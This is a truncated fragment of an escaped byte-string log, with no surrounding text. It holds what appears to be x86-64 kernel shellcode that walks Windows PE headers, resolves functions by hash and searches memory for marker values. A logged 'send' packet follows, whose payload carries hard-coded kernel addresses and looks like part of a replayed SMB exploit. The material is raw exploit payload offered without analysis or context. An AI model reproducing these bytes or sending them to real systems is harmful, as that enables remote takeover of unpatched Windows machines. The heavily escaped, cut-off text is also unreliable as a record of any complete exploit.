c2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\
\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 11, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\